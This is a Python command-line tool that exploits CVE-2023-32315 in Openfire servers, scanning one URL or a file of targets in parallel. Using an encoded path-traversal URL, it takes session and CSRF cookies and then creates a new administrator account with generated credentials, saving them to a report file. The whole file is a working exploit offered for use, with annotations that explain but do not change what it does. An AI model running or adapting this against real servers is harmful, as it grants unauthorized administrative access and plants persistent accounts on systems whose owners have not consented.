main.py
import random
import string
import argparse
from concurrent.futures import ThreadPoolExecutor
import re
import urllib.request
from urllib.error import HTTPError
def generate_random_string(length):
    """Return ``length`` characters drawn from lowercase ASCII letters and digits.

    Characters are picked with the ``random`` module, a general-purpose PRNG
    rather than a cryptographic one, so the output is reproducible for a
    given generator state.
    """
    alphabet = string.ascii_lowercase + string.digits
    picked = []
    for _ in range(length):
        picked.append(random.choice(alphabet))
    return ''.join(picked)
def match_url_path(url):
    """Reduce a user-supplied target to an ``http://host[:port]`` base URL.

    * ``http://`` or ``https://`` input: everything after the authority is
      dropped and the result always carries the ``http://`` scheme, so an
      ``https://`` target is rewritten to plain HTTP.
    * Input with no ``scheme://`` prefix: returned unchanged apart from a
      prepended ``http://``.
    * Input with any other scheme: ``None``.
    """
    authority = re.match(r'^http[s]?://([^/]+)', url)
    if authority is not None:
        return 'http://' + authority.group(1)
    has_scheme = re.match(r'^\w+://', url) is not None
    return None if has_scheme else 'http://' + url
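def get_version(url):
    """Fetch ``<url>/login.jsp`` and extract the Openfire version it displays.

    Args:
        url: Base URL of the server, without a trailing slash.

    Returns:
        The captured version string, or ``None`` when the page has no
        matching banner or the request or decoding fails (the error is
        printed in that case).

    The returned value is text taken from a page the remote host controls;
    nothing here validates that it is a well-formed version number.
    """
    # Banner format: "Openfire, <label>: <a>.<b>.<c>". The first component may
    # contain CJK characters as well as word characters.
    pattern = r"Openfire,.+?:\s*([\w\u4e00-\u9fa5]+\.\w+\.\w+)"
    try:
        # The context manager closes the HTTP response on every path; the
        # original left it open until garbage collection.
        with urllib.request.urlopen(url + "/login.jsp") as response:
            html_content = response.read().decode("utf-8")
    except HTTPError as e:
        print(f"{url} - 发生HTTP错误:{e.code}")
        return None
    except Exception as e:
        # Best-effort by design: URL errors, decode errors and a non-string
        # ``url`` are all reported and turned into "no version".
        print(f"{url} - 发生错误:{str(e)}")
        return None
    match = re.search(pattern, html_content)
    return match.group(1) if match else None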
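def check_version_range(version):
    """Report whether ``version`` lies in the ranges this script treats as
    affected by CVE-2023-32315.

    The ranges are ``3.10.0 <= v < 4.6.8`` and ``4.7.0 <= v < 4.7.5``
    (upper bounds exclusive).

    Components are compared as integers. Comparing the raw strings, as the
    previous implementation did, orders "4.10.0" before "4.6.8" and "3.9.0"
    after "3.10.0", which misclassifies both.

    Args:
        version: Dotted version string with three components, e.g. "4.7.4".

    Returns:
        ``True`` when the version is inside either range. ``False`` when it
        is outside both, and also when it is not three dot-separated decimal
        numbers, so callers cannot tell "unparseable" from "out of range".
    """
    if not isinstance(version, str):
        return False
    parts = version.split(".")
    # isascii() keeps out non-ASCII digit characters that int() would accept.
    if len(parts) != 3 or not all(p.isascii() and p.isdigit() for p in parts):
        return False
    parsed = tuple(int(p) for p in parts)
    return (3, 10, 0) <= parsed < (4, 6, 8) or (4, 7, 0) <= parsed < (4, 7, 5)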
def verify(target):
    """Run the three-step CVE-2023-32315 check against one Openfire server.

    Step 1 reads the version from the login page and stops unless
    ``check_version_range`` accepts it. Step 2 requests a setup-area page
    through the ``/setup/setup-s/%u002e%u002e/%u002e%u002e/`` path and reads
    the session cookies from the HTTP 500 response. Step 3 sends a
    ``user-create.jsp`` request with ``isadmin=on``, so a successful run
    changes server state: it leaves a new administrator account on the
    target.

    Returns:
        ``{target: {step_name: message}}``. On success the ``setup3``
        message contains the generated username and password in clear text.

    The ``%u002e%u002e`` sequence under ``/setup/setup-s/`` is sent verbatim
    in the request URL in steps 2 and 3, so it is the string a log search
    for this traffic would match (assuming the server or proxy logs request
    paths).
    """
    result = {}
    try:
        # Step 1: check the version
        print(f"{target} - 正在处理 setup 1...")
        version = get_version(target)
        if not version:
            result['setup1'] = "无法获取版本信息"
            return {target: result}
        if not check_version_range(version):
            result['setup1'] = f"该网站不在CVE-2023-32315漏洞影响范围"
            return {target: result}
        result['setup1'] = f"该网站版本为:{version}"
        print(f"{target} - 正在处理 setup 2...")
        # Step 2: obtain the csrf token and JSESSIONID
        jsessionid = ""
        csrf = ""
        url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
        try:
            # A non-error response is not used: jsessionid stays empty and the
            # function returns the "Failed to get JSESSIONID" message below.
            response = urllib.request.urlopen(url)
        except HTTPError as e:
            if e.code == 500:
                # NOTE(review): get_all() returns None when no Set-Cookie
                # header is present; len(None) then raises TypeError, which
                # the outer handler prints before returning the partial result.
                cookies = e.headers.get_all('Set-Cookie')
                # The parsing assumes JSESSIONID is the first cookie and csrf
                # the second; cookie names are not checked.
                if len(cookies) == 1:
                    jsessionid = cookies[0].split('=')[1].split(';')[0]
                if len(cookies) == 2:
                    jsessionid = cookies[0].split('=')[1].split(';')[0]
                    csrf = cookies[1].split('=')[1].split(';')[0]
            else:
                result['setup2'] = "该网站有误,请自行手动测试:" + f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp"
                return {target: result}
        result['setup2'] = f"成功获取目标JSESSIONID: {jsessionid} + csrf: {csrf}"
        if jsessionid == "":
            result['setup2'] = "Failed to get JSESSIONID or csrf value"
            return {target: result}
        print(f"{target} - 正在处理 setup 3...")
        # Step 3: add a user
        username = generate_random_string(6)
        password = generate_random_string(6)
        # The csrf value comes from the server's cookie and is placed in the
        # query string without URL-encoding.
        createUserUrl = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
        headers = {"Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}"}
        # Build the Request object and set the request headers
        request = urllib.request.Request(createUserUrl, headers=headers)
        # Send the GET request
        try:
            res = urllib.request.urlopen(request)
            # Success is judged by the status code alone; the response body is
            # not inspected to confirm that the account exists.
            if res.code == 200:
                result['setup3'] = f"用户增加成功:username:{username} password:{password}"
            else:
                result['setup3'] = "用户添加失败。"
        except Exception as e:
            result['setup3'] = f"用户添加失败。发生错误:{str(e)}"
    except Exception as e:
        # Anything unexpected is printed; whatever was recorded so far is
        # still returned.
        print(f"{target} - 发生错误:{str(e)}")
    return {target: result}
def print_result(result):
    """Print every target followed by its per-step messages.

    ``result`` maps a target URL to a dict of step name -> message. Each
    line is followed by a blank line because the text already ends in a
    newline before ``print`` adds its own.
    """
    for target in result:
        steps = result[target]
        print(f"{target}:\n")
        for step in steps:
            print(f" {step}: {steps[step]}\n")
def main():
    """Parse the command line and run ``verify`` on one URL or a file of URLs.

    ``-u`` checks a single target and prints the result. ``-l`` reads one
    target per line, runs them on a thread pool of ``-t`` workers (default
    10) and writes all results to ``vuln.txt`` in the current directory.
    With neither option nothing is checked.
    """
    parser = argparse.ArgumentParser(description="执行命令:./CVE-2023-32315 -u http://127.0.0.1:9090")
    parser.add_argument("-u", dest="target_url", help="目标URL")
    parser.add_argument("-l", dest="file_path", help="URL文件路径")
    parser.add_argument("-t", dest="thread", type=int, default=10, help="线程数,默认为10")
    args = parser.parse_args()
    finalresult = {}
    if args.target_url:
        url = match_url_path(args.target_url)
        if url != None:
            result = verify(url)
            finalresult.update(result)
            print_result(finalresult)
        else:
            print(f"请检查{args.target_url}是否有误")
    elif args.file_path:
        # Both files are opened with the platform's default text encoding.
        with open(args.file_path, 'r') as file:
            # match_url_path returns None for a line with a non-HTTP scheme;
            # such entries are not filtered out and reach verify() as None.
            targets = [match_url_path(line.strip()) for line in file if line.strip()]
        with ThreadPoolExecutor(max_workers=args.thread) as executor:
            results = []
            for target in targets:
                results.append(executor.submit(verify, target))
            count = 1
            # Results are collected in submission order, not completion order.
            for future in results:
                result = future.result()
                # Keyed by target, so duplicate lines collapse into one entry.
                finalresult.update(result)
                print(f"完成 {count}/{len(targets)}")
                count += 1
        # NOTE(review): the page lost its indentation; writing the report is
        # assumed to belong to the -l branch only.
        # The file is overwritten on each run and holds every message verify()
        # recorded, including any created username and password in clear text.
        file_name = "vuln.txt"
        with open(file_name, 'w') as file:
            for url, result in finalresult.items():
                file.write(f"{url}:\n")
                for setup, msg in result.items():
                    file.write(f" {setup}: {msg}\n")
# Run the command-line entry point only when the file is executed as a
# script, not when it is imported.
if __name__ == "__main__":
    main()